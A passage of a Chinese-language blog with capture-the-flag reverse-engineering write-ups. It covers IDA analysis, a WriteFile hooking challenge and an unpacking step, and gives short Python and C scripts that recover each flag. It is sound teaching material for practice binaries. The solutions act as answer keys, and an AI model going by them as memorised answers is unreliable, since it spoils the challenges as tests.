alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/TP2bDEoU5VOjqwv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>因此我们可以分析得出,通过v15/v14作为内部数组下标,循环获到的整数再作为外部数组的下标,获取到需要的字符串。</p><p><strong>这里值得注意的一点是,algn 8表示两个数之间间隔8位,相当于在两个数之间插了7个0,也就相当于在头两个数之间还有一个’0’</strong></p><p>写出脚本</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">S = <span class="string">'L3t_ME_T3ll_Y0u_S0m3th1ng_1mp0rtant_A_{FL4G}_W0nt_b3_3X4ctly_th4t_345y_t0_c4ptur3_H0wev3r_1T_w1ll_b3_C00l_'</span></span><br><span class="line"></span><br><span class="line">N = [<span class="number">0x24</span>,<span class="number">0x0</span>,<span class="number">0x5</span>,<span class="number">0x36</span>,<span class="number">0x65</span>,<span class="number">0x7</span>,<span class="number">0x27</span>,<span class="number">0x26</span>,<span class="number">0x2d</span>,<span class="number">0x1</span>,<span class="number">0x3</span>,<span class="number">0x0</span>,<span class="number">0x0d</span>,<span class="number">0x56</span>,<span class="number">0x1</span>,<span class="number">0x3</span>,<span class="number">0x65</span>,<span class="number">0x3</span>,<span class="number">0x2d</span>,<span class="number">0x16</span>,<span class="number">0x2</span>,<span class="number">0x15</span>,<span class="number">0x3</span>,<span class="number">0x65</span>,<span class="number">0x0</span>,<span class="number">0x29</span>,<span class="number">0x44</span>,<span class="number">0x44</span>,<span class="number">0x1</span>,<span class="number">0x44</span>,<span class="number">0x2b</span>]</span><br><span class="line"></span><br><span class="line">x = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> N:</span><br><span class="line"> x += S[i]</span><br><span class="line"></span><br><span class="line">print(x)</span><br></pre></td></tr></table></figure></div><h3 id="re4-unvm-me"><a href="#re4-unvm-me" class="headerlink" title="re4-unvm-me"></a>re4-unvm-me</h3><p>pyc在线pyc转</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># visit http://tool.lu/pyc/ for more information</span></span><br><span class="line"><span class="keyword">import</span> md5</span><br><span class="line">md5s = [</span><br><span class="line"> <span class="number">0x831DAA3C843BA8B087C895F0ED305CE7L</span>,</span><br><span class="line"> <span class="number">0x6722F7A07246C6AF20662B855846C2C8L</span>,</span><br><span class="line"> <span class="number">0x5F04850FEC81A27AB5FC98BEFA4EB40CL</span>,</span><br><span class="line"> <span class="number">0xECF8DCAC7503E63A6A3667C5FB94F610L</span>,</span><br><span class="line"> <span class="number">0xC0FD15AE2C3931BC1E140523AE934722L</span>,</span><br><span class="line"> <span class="number">0x569F606FD6DA5D612F10CFB95C0BDE6DL</span>,</span><br><span class="line"> <span class="number">0x68CB5A1CF54C078BF0E7E89584C1A4EL</span>,</span><br><span class="line"> <span class="number">0xC11E2CD82D1F9FBD7E4D6EE9581FF3BDL</span>,</span><br><span class="line"> <span class="number">0x1DF4C637D625313720F45706A48FF20FL</span>,</span><br><span class="line"> <span class="number">0x3122EF3A001AAECDB8DD9D843C029E06L</span>,</span><br><span class="line"> <span class="number">0xADB778A0F729293E7E0B19B96A4C5A61L</span>,</span><br><span class="line"> <span class="number">0x938C747C6A051B3E163EB802A325148EL</span>,</span><br><span class="line"> <span class="number">0x38543C5E820DD9403B57BEFF6020596DL</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'Can you turn me back to python ? ...'</span></span><br><span class="line">flag = raw_input(<span class="string">'well as you wish.. what is the flag: '</span>)</span><br><span class="line"><span class="keyword">if</span> len(flag) > <span class="number">69</span>:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">if</span> len(flag) % <span class="number">5</span> != <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, len(flag), <span class="number">5</span>):</span><br><span class="line"> s = flag[i:i + <span class="number">5</span>]</span><br><span class="line"> <span class="keyword">if</span> int(<span class="string">'0x'</span> + md5.new(s).hexdigest(), <span class="number">16</span>) != md5s[i / <span class="number">5</span>]:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Congratz now you have the flag'</span></span><br></pre></td></tr></table></figure></div><p>16进制转md5,在线工具直接解</p><h3 id="流浪者"><a href="#流浪者" class="headerlink" title="流浪者"></a>流浪者</h3><p>根据字符串的查找,找到关键函数。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/XjDhKBWLoemAa4p.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>x交叉引用,找到引用了sub_4017f0的函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/9eN7nqHd6LvksVf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>分析函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; Str[i]; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">57</span> || Str[i] < <span class="number">48</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">122</span> || Str[i] < <span class="number">97</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">90</span> || Str[i] < <span class="number">65</span> )</span><br><span class="line"> sub_4017B0(); // 错误</span><br><span class="line"> <span class="keyword">else</span> // <span class="number">65</span><span class="number">-90</span> +<span class="number">29</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">29</span>; // 大写</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> { // <span class="number">97</span><span class="number">-122</span> +<span class="number">87</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">87</span>; // 小写</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> { // <span class="number">48</span><span class="number">-57</span> +<span class="number">48</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">48</span>; // 数字-‘<span class="number">0</span>‘</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> sub_4017F0(v5);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>写出解题脚本</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">tab=<span class="string">'abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ'</span></span><br><span class="line">tg=<span class="string">'KanXueCTF2019JustForhappy'</span></span><br><span class="line">temp=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(tg)):</span><br><span class="line"> temp.append(tab.index(tg[i]))</span><br><span class="line">print(temp)</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> temp:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="number">65</span><span class="number">-29</span> <span class="keyword">and</span> c<=<span class="number">90</span><span class="number">-29</span>:</span><br><span class="line"> c+=<span class="number">29</span></span><br><span class="line"> <span class="keyword">elif</span> c>=<span class="number">97</span><span class="number">-87</span> <span class="keyword">and</span> c<=<span class="number">122</span><span class="number">-87</span>:</span><br><span class="line"> c+=<span class="number">87</span></span><br><span class="line"> <span class="keyword">elif</span> c>=<span class="number">48</span><span class="number">-48</span> <span class="keyword">and</span> c<=<span class="number">57</span><span class="number">-48</span>:</span><br><span class="line"> c+=<span class="number">48</span></span><br><span class="line"> flag+=chr(c)</span><br><span class="line"><span class="keyword">print</span> (flag)</span><br></pre></td></tr></table></figure></div><h3 id="666"><a href="#666" class="headerlink" title="666"></a>666</h3><p>没啥好解释的,拖入ida查看主函数,main函数中,用户输入保存到v5。然后调用encode(&v5,&s)函数。</p><p>在判断中,首先比较用户输入的长度是否等于key,也就是18。然后比较了s和enflag是否相等。s应该是刚刚调用encode函数后得到的。enflag的值为<code>izwhroz""w"v.K".Ni</code></p><p>其中,key的值为18,enflag的值为<code>izwhroz""w"v.K".Ni</code>:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/DFOehNzBxX2aAy6.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>现在来看看encode函数。<br>a1也就是main函数里用户的输入v5,a2是main函数里的s,是最后要比较的字符串。<br>首先呢,检查了一下用户输入的长度,必须为key。<br>然后在一个for循环中,每次取用户输入的三个字符,分别做相关的异或运算,再分别赋值给a2的对应的位置。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/39EGHuigIXvSpCk.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>对应写出脚本,这里分别用c和py分别写出相应代码。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> i;</span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> target[]=<span class="string">"izwhroz\"\"w\"v.K\".Ni"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(i=<span class="number">0</span>;i<<span class="number">18</span>;i+=<span class="number">3</span>){</span><br><span class="line"></span><br><span class="line"> target[i]=(target[i]^<span class="number">18</span>)<span class="number">-6</span>;</span><br><span class="line"></span><br><span class="line"> target[i+<span class="number">1</span>]=(target[i+<span class="number">1</span>]^<span class="number">18</span>)+<span class="number">6</span>;</span><br><span class="line"></span><br><span class="line"> target[i+<span class="number">2</span>]=(target[i+<span class="number">2</span>]^<span class="number">18</span>)^<span class="number">6</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(target);</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">enflag=[<span class="number">105</span>, <span class="number">122</span>, <span class="number">119</span>, <span class="number">104</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">122</span>, <span class="number">34</span>, <span class="number">34</span>, <span class="number">119</span>, </span><br><span class="line"> <span class="number">34</span>, <span class="number">118</span>, <span class="number">46</span>, <span class="number">75</span>, <span class="number">34</span>, <span class="number">46</span>, <span class="number">78</span>, <span class="number">105</span>, <span class="number">0</span>]</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">18</span>,<span class="number">3</span>):</span><br><span class="line"> flag+=chr((<span class="number">18</span>^enflag[i])<span class="number">-6</span>)</span><br><span class="line"> flag+=chr((<span class="number">18</span>^enflag[i+<span class="number">1</span>])+<span class="number">6</span>)</span><br><span class="line"> flag+=chr(<span class="number">18</span>^enflag[i+<span class="number">2</span>]^<span class="number">6</span>) </span><br><span class="line"> </span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="ReverseMe-120"><a href="#ReverseMe-120" class="headerlink" title="ReverseMe-120"></a>ReverseMe-120</h3><p>打开ida,首先查看一下程序逻辑</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/JCQVIn2gzx43PST.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p> 可以看到成功的条件是<code>v9</code>,而<code>v9</code>是<code>v13</code>与字符串”<code>you_know_how_to_remove_junk_code</code>“比较的结果。然后追一下<code>v13</code>的数据流,看看<code>v13</code>是怎么来的</p><p>可以看到<code>v13</code>的定义,以及一个关键函数<code>sub_401000</code>,为什么说是关键函数呢,因为函数的参数包含了<strong>刚定义的</strong><code>v13</code>,以及<strong>你的输入</strong><code>v11</code>。</p><p> 我们跟进去看一看,注意我们想知道的是<code>v13</code>是怎么得到的,而<code>v13</code>作为<strong>第二个参数</strong>,在函数<code>sub_401000</code>里是<code>a2</code>,我们顺着<code>a2</code>去看。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/veyU4frF1wlQ8Nq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现是base64加密。参考笔记:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/D7SrYZMOXL1J6fl.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>写出解密脚本</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">s=<span class="string">'you_know_how_to_remove_junk_code'</span></span><br><span class="line">tmp=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(s)):</span><br><span class="line"> tmp+=chr(ord(s[i])^<span class="number">0x25</span>)</span><br><span class="line">print(base64.b64encode(tmp.encode(<span class="string">'utf-8'</span>)))</span><br></pre></td></tr></table></figure></div><h3 id="EASYHOOK"><a href="#EASYHOOK" class="headerlink" title="EASYHOOK"></a>EASYHOOK</h3><p> IDA 打开,F5 分析 main 函数如下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/3feh4s7lUoCFDaH.png" alt="image-20201202163002260" title=""> </div> <div class="image-caption">image-20201202163002260</div> </figure><p>大概分析可得,输入的 flag 长度应为 19,长度验证正确后会先调用 sub_401220 函数,该函数功能未知。然后通过 CreateFileA 和 WriteFile 将输入的 flag 写入到一个文件里面,双击 FileName 可知是写入到本地目录下的 Your_Input 文件里面。接着调用 sub_401240 函数,因为传入了 buffer 和NumberOfBytesWritten 的地址,结合紧跟着 sub_401240 后面的一个关键判断,所以很可能 sub_401240 就是对 flag 进行验证的关键函数了。</p><p>从上面分析得知,输入的长度为 19 的 flag 会被写入到文件里面。然而测试之后发现,写入到文件里面的 flag 发生了改变。回顾 main 函数的执行流程,可知对 flag 的修改要么发生在 sub_401220 函数里面,要么是WriteFile 函数出了问题。由于题目的名称给出了 hook 的提示信息,于是猜测在 sub_401220 里面 hook 了WriteFile 函数。直接 F5 分析 sub_401220 函数,报错。查看汇编代码得知猜测正确,分析如下:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/j4fGlDYMrcKxwy5.png" alt="image-20201202163322284" title=""> </div> <div class="image-caption">image-20201202163322284</div> </figure><p>在 sub_401220 中获取进程句柄后跳转到loc_4011B0。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/NjAm48ZpobEuGUw.png" alt="image-20201202163345312" title=""> </div> <div class="image-caption">image-20201202163345312</div> </figure><p>在 loc_401180 里面通过GetProcAddress 获取WriteFile 的地址,然后调用了sub_4010D0。注意红框框处的几个数据。</p><p>F5 查看 sub_4010D0,可知调用 VirtualProtectEx和 WriteProcessMemory 修改了 WriteFile 函数的起始 5 个字节。动态调试后发现修改为跳转到 sub_401080 的一条无条件跳转指令,从而实现了 hook WriteFile 的功能。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/GAhwgMlzebICosc.png" alt="image-20201202163510734" title=""> </div> <div class="image-caption">image-20201202163510734</div> </figure><p>首先调用 sub_401000 函数,分析参数传递可知参数 lpBuffer 即是我们输入的 flag,那么很有可能就是在 sub_401000 里面对 flag 进行了修改。然后调用 sub_401140 函数,接着又一次调用了WriteFile 函数。我们知道虽然 WriteFile 被 hook 了,但最后确实是把 flag 写入到了文件里面,所以很有可能是在 sub_401140 里面对 WriteFIle 进行了 hook 还原。最后对 sub_401000 的返回值进行判断,如果非 0 则将NumberOfBytesWritten 置 1。</p><p>先分析sub_401140,证实了里面的 hook 还原操作。然后看一下 sub_401000,可知里面主要是两个循环处理:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/KV5CirUT68yRdMJ.png" alt="image-20201202163602738" title=""> </div> <div class="image-caption">image-20201202163602738</div> </figure><p>这里就有一个很明显的字符串比较的意图了,结合上面的分析可知,我们输入的长度为 19 的 flag 经过第一个循环的处理之后,如果和 byte_40A030 指向的全局字符串相同,那么 sub_401000 返回 1。在 sub_401080 里面对sub_401000 的返回值进行判断,如果返回值为 1,则将NumberOfBytesWritten 置 1。然后在最外层的 main函数里面进行判断,如果NumberOfBytesWritten 为 1,则输出正确的提示信息。</p><p>所以,我们只需要将 byte_40A030 指向的字符串做一次 sub_401000 函数里面第一个循环处理的逆运算,就可以得到输入正确的 flag 了。</p><p>当然别忘了在 main 函数里面的 sub_401240 函数,我们刚开始时分析认为在 sub_401240 里面对输入的 flag 做了关键验证,但事实上真正的验证函数是 sub_401000,只要 sub_401000 验证正确即可。</p><p>贴上脚本分别用py和c分别实现</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">data=[ <span class="number">0x61</span>, <span class="number">0x6A</span>, <span class="number">0x79</span>, <span class="number">0x67</span>, <span class="number">0x6B</span>, <span class="number">0x46</span>, <span class="number">0x6D</span>, <span class="number">0x2E</span>, <span class="number">0x7F</span>, <span class="number">0x5F</span>,</span><br><span class="line"> <span class="number">0x7E</span>, <span class="number">0x2D</span>, <span class="number">0x53</span>, <span class="number">0x56</span>, <span class="number">0x7B</span>, <span class="number">0x38</span>, <span class="number">0x6D</span>, <span class="number">0x4C</span>, <span class="number">0x6E</span>, <span class="number">0x00</span>]</span><br><span class="line">data[<span class="number">18</span>]^=<span class="number">0x13</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">17</span>,<span class="number">-1</span>,<span class="number">-1</span>):</span><br><span class="line"> t=i^data[i]</span><br><span class="line"> <span class="keyword">if</span> i%<span class="number">2</span>:</span><br><span class="line"> data[i]=t+i</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data[i+<span class="number">2</span>]=t</span><br><span class="line">print(<span class="string">''</span>.join(map(chr,data)))</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><algorithm></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><vector></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><iostream></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><map></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><time.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><queue></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"windows.h"</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> str[] =</span><br><span class="line">{</span><br><span class="line"> <span class="number">0x61</span>, <span class="number">0x6A</span>, <span class="number">0x79</span>, <span class="number">0x67</span>, <span class="number">0x6B</span>, <span class="number">0x46</span>, <span class="number">0x6D</span>, <span class="number">0x2E</span>, <span class="number">0x7F</span>, <span class="number">0x5F</span>,</span><br><span class="line"> <span class="number">0x7E</span>, <span class="number">0x2D</span>, <span class="number">0x53</span>, <span class="number">0x56</span>, <span class="number">0x7B</span>, <span class="number">0x38</span>, <span class="number">0x6D</span>, <span class="number">0x4C</span>, <span class="number">0x6E</span>, <span class="number">0x00</span></span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> str[<span class="number">18</span>]^=<span class="number">0x13</span>u;</span><br><span class="line"> <span class="keyword">int</span> v3;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">17</span>;i>=<span class="number">0</span>;i--)</span><br><span class="line"> {</span><br><span class="line"> v3 = i ^ str[i];</span><br><span class="line"> <span class="keyword">if</span>(i%<span class="number">2</span>)</span><br><span class="line"> str[i] = v3 + i;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> str[i+<span class="number">2</span>] = v3;</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s\n"</span>,str);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h3 id="easyre-153"><a href="#easyre-153" class="headerlink" title="easyre-153"></a>easyre-153</h3><p>查看分析是32位elf文件,有壳</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/RNvTVMpK2c7GA1s.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>放到kali下进行脱壳</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/UpCxYFDAqaenT5g.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>ida静态分析</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/mr7RLnhj29bX1xZ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>pipe是完成两个进程之间通信的函数 1是写,0是读</p><p>fork是通过系统调用创建一个“子进程”的函数</p><p>fork的返回值,在子进程里面是0,在父进程里是子进程的进程id</p><p>所以我们可以很容易看出来 在子进程里面,由于v5==0,所以会输出刚刚我们看到的 OMG!!!! I forgot kid’s id 然后将69800876143568214356928753通过pipe传给父进程</p><p>完成这个任务后,子进程就会exit(0)</p><p>至于父进程,由于v5!=0,会跳过子进程刚刚执行的部分,直接读取子进程传给他的那一串数字 并且读取用户输入的v6</p><p>如果v6==v5 那么就会继续进行下面的操作</p><p>也就是说程序会创建一个管道,然后开启一个子进程进行进程间通信。子进程将 <strong>69800876143568214356928753</strong> 发送给父进程。父进程要求用户输入一个整数,并且等于子进程的 <strong>pid</strong> 。后面就会对发送过来的数据进行解码成 <strong>flag</strong> 输出来。</p><p>我们进入lol函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/c3TmMtUDf1J9nl5.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>再看流程图</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/GUSC1HW9Laz3b5Z.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>原来输出解码后的数据的那部分代码被作者改掉了,永远也不会执行。解码的操作也不复杂,直接用pthon脚本吧。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">guo=<span class="string">'69800876143568214356928753'</span></span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">flag=chr(<span class="number">2</span>*ord(guo[<span class="number">1</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">4</span>])+ord(guo[<span class="number">5</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">8</span>])+ord(guo[<span class="number">9</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">12</span>])*<span class="number">2</span>)</span><br><span class="line">flag+=chr(ord(guo[<span class="number">17</span>])+ord(guo[<span class="number">18</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">10</span>])+ord(guo[<span class="number">21</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">9</span>])+ord(guo[<span class="number">25</span>]))</span><br><span class="line"><span class="keyword">print</span> (<span class="string">'RCTF{'</span>+flag+<span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><h3 id="IgniteMe"><a href="#IgniteMe" class="headerlink" title="IgniteMe"></a>IgniteMe</h3><p>32位文件,无壳</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/BYfRjnq27HES6mM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>拖入ida中查看,逻辑不太难,这里面我加了很多注释方便读懂程序。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/lpaJNdFA5zstYbr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>里面有一个很关键的函数sub_4011C0(),函数结构如下:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/7DLn4SzqhsQbro3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/qiUAf3dpWeG5cmO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>EXP</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line">cipher=<span class="string">r'GONDPHyGjPEKruv{{pj]X@rF'</span></span><br><span class="line">k=[<span class="number">0xd</span>,<span class="number">0x13</span>,<span class="number">0x17</span>,<span class="number">0x11</span>,<span class="number">0x2</span>,<span class="number">0x1</span>,<span class="number">0x20</span>,<span class="number">0x1d</span>,<span class="number">0xc</span>,<span class="number">0x2</span>,<span class="number">0x19</span>,<span class="number">0x2f</span>,<span class="number">0x17</span>,<span class="number">0x2b</span>,<span class="number">0x24</span>,<span class="number">0x1f</span>,<span class="number">0x1e</span>,<span class="number">0x16</span>,<span class="number">0x9</span>,<span class="number">0xf</span>,<span class="number">0x15</span>,<span class="number">0x27</span>,<span class="number">0x13</span>,<span class="number">0x26</span>,<span class="number">0xa</span>,<span class="number">0x2f</span>,<span class="number">0x1e</span>,<span class="number">0x1a</span>,<span class="number">0x2d</span>,<span class="number">0xc</span>,<span class="number">0x22</span>,<span class="number">0x4</span>]</span><br><span class="line">ch=<span class="string">''</span></span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(cipher)):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> string.printable:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="string">'a'</span> <span class="keyword">and</span> c<=<span class="string">'z'</span>:</span><br><span class="line"> ch=chr(ord(c)<span class="number">-32</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="string">'A'</span> <span class="keyword">and</span> c<=<span class="string">'Z'</span>:</span><br><span class="line"> ch=chr(ord(c)+<span class="number">32</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> ch=c</span><br><span class="line"> ch=chr(k[i]^((ord(ch)^<span class="number">0x55</span>)+<span class="number">72</span>))</span><br><span class="line"> <span class="keyword">if</span> ch==cipher[i]:</span><br><span class="line"> flag+=c</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (<span class="string">'EIS{'</span>+flag+<span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><p>不过我个人还是喜欢写C语言的,这里也贴一下C语言代码</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span 